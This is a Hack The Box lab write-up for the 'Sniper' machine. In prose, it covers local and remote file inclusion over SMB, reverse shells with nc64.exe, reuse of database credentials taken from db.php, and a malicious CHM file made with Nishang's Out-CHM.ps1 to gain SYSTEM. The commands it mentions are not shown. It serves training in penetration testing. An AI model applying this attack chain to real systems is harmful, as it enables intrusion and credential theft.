Sniper - HTB Writeup
SniperPermalink
Information GatheringPermalink
Nmap Port ScanPermalink
Nmap Script ScanPermalink
Nmap Full Sport ScanPermalink
Nmap Vulnerability ScanPermalink
Service EnumerationPermalink
Nikto Web Scan on Port 80Permalink
FFuF Web Enumeration on Port 80Permalink
Nmap SMB ScanPermalink
HTTP Service EnumerationPermalink
Gobuster Web EnumerationPermalink
/blog Web EndpointPermalink
User Account RegistrationPermalink
PenetrationPermalink
Local File Inclusion - Lang ParameterPermalink
The lang parameter on the /blog/ endpoint is vulnerable to local file inclusion. The curl request below shows the basic local file inclusion of the win.ini file on the target server.
Remote File Inclusion over SMBPermalink
After testing local file inclusion we can attempt to utilize an SMB path starting with \\ and then our attacking machine IP. Standing up a basic SMB server using the Impacket Python library allows us to confirm the connectivity on the back end. The Impacket library server does not appear to be fully functioning but settings up an SMB share on the attacking Kali machine will allow us to use the RFI vulnerability against the full SMB server. Creating a reverse shell is documented below.
iusr User Shell EnumerationPermalink
Once remote code execution is achieved and a reverse shell can be easily spawned by copying nc64.exe onto the box and then executing the reverse shell command.
Privilege EscalationPermalink
SQL Credentials in db.phpPermalink
Chris User ShellPermalink
The Chris user is the only other interactive user on the target machine. Using the stolen MySQL credentials to create a PowerShell command we can run our reverse shell as the Chris user.
Chris User Shell EnumerationPermalink
It appears that C:\Docs is being used to discuss documentation on a new PHP project and they are expecting files to be placed there so that they can be read. After placing our CHM file in our downloads folder here we can see that it is read and deleted.
Crafting Malicious CHM FilePermalink
Because this CHM file is being opened and deleted we can craft a malicious file to be read by the end user. A tool has been created to do just that called Out-CHM.ps1 by Nishang. Below illustrates the steps for successful exploitation. A second Windows VM was used to compile the particular file.
https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1
Administrator User ShellPermalink
By mounting the attacking machine SMB share using net use we can easily access files on the attacking server from the compromised user shell. Simply copying files off of this share to the C:\Docs location and waiting will return a user shell as the NT AUTHORITY\SYSTEM user, allowing for infinite control over the target system.
